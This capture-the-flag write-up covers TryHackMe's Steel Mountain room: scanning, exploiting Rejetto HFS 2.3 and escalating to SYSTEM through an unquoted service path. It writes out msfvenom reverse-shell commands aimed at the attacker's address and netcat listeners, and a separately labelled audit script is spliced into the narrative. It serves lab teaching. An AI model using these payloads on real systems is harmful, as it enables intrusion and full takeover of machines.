Steel Mountain - TryHackMe Room
The link for this lab is located here: https://tryhackme.com/room/steelmountain
In this room you will enumerate a Windows machine, gain initial access with Metasploit, use PowerShell to further enumerate the machine and escalate your privileges to Administrator.
Task 1 - Initial Access
The first step in any room is to perform a scan of the machine to see what ports are open and, potentially, what services and versions are running. For me, this means two scans - a simple all-ports scan and a more detailed service-detection scan on the ports found open. The first scan has the following syntax:
nmap -Pn -p- 10.10.65.225 -oN portscan
Where:
-Pn skips pinging the host
-p- scans all ports
-oN portscan outputs to a file called portscan
This reveals a variety of open ports and services, including HTTP, NetBIOS and more. With these ports found open, we can run a more intensive scan on just those ports to gather more information about them - including possible version numbers and OS detection.
For this second scan, the syntax is the following:
nmap -Pn -T4 -A -p80,135,139,445,3389,5985,8080,47001,47152,47153,47154,47156,47163,47164 10.10.65.225 -oN servicescan
Where:
-Pn skips pinging the host
-T4 speeds up the scan
-A performs service detection, OS detection and runs some scripts
-p[numbers] specifies only the ports found open
-oN servicescan outputs to a file called servicescan
This reveals a lot more information, including that Microsoft IIS 8.5 is running on port 80, that the OS is likely Windows Server 2008 R2 (from the NetBIOS information) and that HTTPFileServer 2.3 is running on port 8080.
The next step is to navigate to the website running on port 80.
As we can see, this is a very simple website with a logo and an image of a man. If you have watched the show Mr Robot, you will recognize this “employee of the month” as Bill Harper. If you don’t know who he is, taking a peek at the source code of the site reveals the full name of the image as “BillHarper.png”.
Not much else is on this site. Looking back at the Nmap scan, we saw that there was an HttpFileServer running on port 8080 - this suggests to me that a second, less obvious website is running on the server. Navigating to [IP]:8080 reveals the site.
At the bottom of the page we can actually see a version - HTTPFileServer 2.3. Clicking on the link provided reveals that HTTP File Server is a service for sending and receiving files.
Since we have a version number, we can try searching for a possible exploit. Googling “rejetto httpfileserver 2.3 exploit” reveals a possible remote command execution vulnerability for this specific version.
To use this exploit, we first start up the Metasploit console.
Once it is running, we can search for an exploit for “rejetto” using the search functionality. An exploit module is returned for the remote command execution vulnerability we saw before.
Next, we simply use this exploit, either by the number on the left of the search results (in this case 0) or by typing the full path to the exploit as given by Metasploit.
Now that we have the right module loaded, we can show the options that we need to set for this exploit to work by typing “options”.
As we can see, there are multiple options that have the Required field set to yes - these MUST be filled out in order to run properly. These options are RHOSTS, RPORT, SRVHOST, SRVPORT, TARGETURI, LHOST, LPORT, and EXITFUNC.
Some of these we can leave at their defaults, but some need to be changed or set. For this exploit, we need to set RHOSTS, RPORT, LHOST and LPORT. The RHOSTS option is the IP of the target machine (10.10.65.225). RPORT is the port the HFS server is running on (in this case 8080). LHOST is our local machine’s VPN address received from TryHackMe (10.11.3.112). Finally, LPORT is the port that will be opened on our local machine to listen for a connection - port 4444 is fine, although you can change it if you want.
Once all these options are set, we can simply run the exploit using the “run” command and hopefully, we should receive a meterpreter shell back.
Once on the system, we can simply cd to the Desktop directory and grab the user.txt flag.
Task 2 - Privilege Escalation
To enumerate this machine, we will use a PowerShell script called PowerUp, whose purpose is to evaluate a Windows machine and determine any abnormalities - PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.
You can download the script here either via your browser or by using the wget command.
Next, you can use the upload command in Meterpreter to upload the script to the target machine.
Once uploaded, we load PowerShell into the meterpreter session using the “load powershell” command.
To access a PowerShell prompt, we simply type “powershell_shell” to drop down to a PS prompt.
Once in the PS shell, we can simply run the PowerUp.ps1 script by typing “. .\PowerUp.ps1”.
Once loaded, we can then run “Invoke-AllChecks” to gather information.
This reveals a service that has the “CanRestart” option set to True. CanRestart being true allows us to restart that service on the system, and the directory holding the application is also writable. This means we can replace the legitimate application with our own and restart the service, which will then run our program.
The program also has an Unquoted Service Path. In short, an Unquoted Service Path vulnerability arises when the path to an executable contains spaces (/Path To/The Executable/File.exe) and isn’t enclosed in quotation marks, so Windows interprets each prefix ending at a space as a candidate executable (Path.exe, The.exe, File.exe) until it finds the actual file.
Looking at the path of this executable, we can see there is a space between Program and Files, but we probably don’t have write access to the root of the C:\ drive. Further into the path, we see there is a space between Advanced and SystemCare - this means that Windows will look for a file called Advanced.exe and then SystemCare.exe before dropping into the directory.
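The search order just described, as an added audit example that is not part of this write-up: a small Python script that lists the files Windows would try for an unquoted ImagePath, flags the ones that land in a writable directory (the same finding PowerUp reports here and winPEAS reports in Task 3) and produces the quoted form that removes the issue. The service binary name, the other two sample services and the writable-directory set are constructed placeholders, since the write-up does not give them.

```python
import re

# Constructed sample ImagePath values. The write-up names the service and the space
# between "Advanced" and "SystemCare" but not the binary, so "Service.exe" is a placeholder.
SAMPLE_SERVICES = {
    "AdvancedSystemCareService9": r"C:\Program Files (x86)\IObit\Advanced SystemCare\Service.exe",
    "QuotedService": r'"C:\Program Files (x86)\IObit\Advanced SystemCare\Service.exe"',
    "Schedule": r"C:\Windows\System32\svchost.exe -k netsvcs",
}

# Directories assumed writable by the low-privileged user (constructed for the demo;
# on a real host this comes from an ACL check, which is what PowerUp performs).
WRITABLE_DIRS = {r"C:\Program Files (x86)\IObit"}


def split_image_path(image_path):
    """Return (executable, arguments) for a service ImagePath, honouring quotes."""
    p = image_path.strip()
    if p.startswith('"'):
        exe, _, rest = p[1:].partition('"')
        return exe, rest
    m = re.match(r"(.*?\.exe)(.*)", p, re.IGNORECASE)
    return (m.group(1), m.group(2)) if m else (p, "")

def is_unquoted_with_spaces(image_path):
    """PowerUp-style finding: the executable path is unquoted and contains a space."""
    return not image_path.strip().startswith('"') and " " in split_image_path(image_path)[0]

def candidate_executables(image_path):
    """Files Windows tries, in order, when resolving an unquoted path with spaces:
    every prefix that ends at a space gets '.exe' appended, then the full path."""
    exe, _ = split_image_path(image_path)
    if image_path.strip().startswith('"'):
        return [exe]  # a quoted path is never searched this way
    tokens = exe.split(" ")
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))] + [exe]

def risky_candidates(image_path, writable_dirs):
    """Candidates that sit in a directory the user can write to; these are the
    findings an administrator must fix (PowerUp and winPEAS both report them)."""
    return [c for c in candidate_executables(image_path)
            if c.rsplit("\\", 1)[0] in writable_dirs]

def quote_image_path(image_path):
    """Mitigation: wrap the executable in quotes so the search order above never runs."""
    # On the host the quoted value is applied with: sc config <name> binPath= "<quoted path>"
    exe, rest = split_image_path(image_path)
    return f'"{exe}"{rest}'
```

Fixing the ACL on the IObit directory so standard users cannot write to it closes the second half of the problem; quoting the path alone only stops the search, not the writable directory.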
Knowing this, we can generate an executable file using msfvenom called “Advanced.exe” that uses a meterpreter payload via the following syntax:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.3.112 LPORT=4456 -f exe > Advanced.exe
Once generated, we can navigate to the C:\Program Files (x86)\IObit directory and upload the Advanced.exe executable - this is the directory where Windows will look for a file named “Advanced.exe” due to unquoted service paths.
Once uploaded, we need a way to catch the reverse shell. Since we are using a meterpreter payload, we need to use the handler in Metasploit. Simply use the “exploit/multi/handler” module and set the options to the EXACT same as you did in the msfvenom command - otherwise it won’t work.
Once set, simply type the “run” command and the listener will wait for a connection.
Now that everything is in place, we can get back to the meterpreter shell, drop down to a PowerShell prompt once again and stop the running service by the name shown in the Invoke-AllChecks output (the service name here is AdvancedSystemCareService9). To stop a service using PowerShell, we use the “Stop-Service” command followed by the name.
Once stopped, we simply use the “Start-Service” command to start the service back up. During start-up, Windows will look for the Advanced.exe file due to the unquoted path, and that file now exists - it is our payload. When it runs, we will get an error from PowerShell.
However, navigating back to our Metasploit handler reveals that a second meterpreter session has opened, running as NT AUTHORITY\SYSTEM - we have full admin privileges.
For me, this shell was incredibly unstable and would actually die after about a minute or so. If it is stable for you and maintains a meterpreter session, you can simply navigate to the C:\Users\Administrator\Desktop directory and grab the root.txt flag.
However, if you are having the same problem I was, there is another method. Instead of a meterpreter payload, we generate a simple shell_reverse_tcp payload with msfvenom.
Afterwards, the steps are pretty much the same. Once again, we navigate to the IObit directory and upload the Advanced.exe payload we generated.
When we reach the listener stage, however, we use netcat instead of the Metasploit handler - we don’t need a special listener, since we are using a plain shell instead of meterpreter. Simply use netcat to listen on the port you used when generating the reverse shell with msfvenom.
Finally, simply stop the service again using the same commands as before via a PowerShell prompt.
Then start the service once again using the same PowerShell syntax.
An error will appear once again, but looking back at netcat, we see a reverse shell has appeared. Running the whoami command reveals we are once again running as NT AUTHORITY\SYSTEM - full privileges.
Simply navigate to the Administrator desktop to get the root.txt flag again.
Task 3 - Access and Escalation without Metasploit
To access the system without Metasploit we’ll need to do a bit of research on the Rejetto file server exploit in Exploit-DB. Doing this research, we find the same exploit, but this time we will use the raw Python code and NOT the Metasploit module. This code can be found here.
However, before we start, we will need three things downloaded. First, the raw Python code located here. Secondly, we will need a netcat binary on the target machine; we can download a netcat .exe file from here. Finally, we need to download the winPEAS executable for privilege escalation, found here.
Once all of them are downloaded, to make things easier, we can create a new directory containing these three files.
To put it briefly, we’ll run the exploit twice:
Stage 1. The exploit looks for the nc.exe file on the local machine’s file system and uploads it to the target machine.
Stage 2. The exploit executes nc.exe on the target server, forcing it to connect back to our local host.
Now, before running the Python exploit code, we need to modify the local IP and local port number in the source code. The IP will be the TryHackMe VPN IP, and for the port you can choose any free port you want - I chose 6678.
Once edited, we first host the netcat executable via a Python3 web server on port 80.
Once hosting, we need to start a netcat listener on the same port we used in the Python source code - for me that is port 6678.
Once everything is ready, we simply run the exploit twice, specifying the target IP address and the port running the HFS file server (port 8080). You may notice my IP is different from the start - this is because I restarted the machine due to an error, but it should be the same for you as before.
Once executed, we can see that nc.exe was downloaded from our Python web server.
Navigating to the netcat listener, we see we have received a shell back on the target system.
Now that we are on the system, we need to escalate our privileges. To do this, I first navigate to Bill’s desktop, because we have the privileges to write there. Once there, we can use PowerShell to download the winPEAS.exe file from our still-running Python3 web server to the target machine.
Once downloaded, simply run it using the “.\winPEAS.exe” command and wait for it to finish. Once run, it will identify the same AdvancedSystemCareService9 service with the unquoted service path and also tell us that bill has write permissions.
Once identified, we can once again use msfvenom to generate a reverse shell named Advanced.exe that will be executed because of the unquoted service path.
To upload the Advanced.exe file, we can put the .exe into the same directory as the Python web server and use PowerShell once again to download it to the target.
Before copying the Advanced.exe file from Bill’s desktop to the right folder, we need to stop the service that is using it. To stop the service, use the “sc stop AdvancedSystemCareService9” command. Once stopped, use the “copy” command to copy the file to the IObit directory.
Finally, we once again start a netcat listener using the same port specified in msfvenom.
Lastly, we simply use the “sc start AdvancedSystemCareService9” command to restart the service and execute our Advanced.exe file.
It will produce an error. However, navigating back to the netcat listener, we get a shell back running as the SYSTEM user - full privileges.
And, for the final time, we can navigate to the admin’s desktop and get the root.txt flag.
I hope this room has been as informative for you as it was for me. I included the failed attempt at using a meterpreter shell as a lesson that things will not always work out and you will have to think on your feet and try another method. I hope you enjoyed this write-up, and good luck on your journey to becoming a master.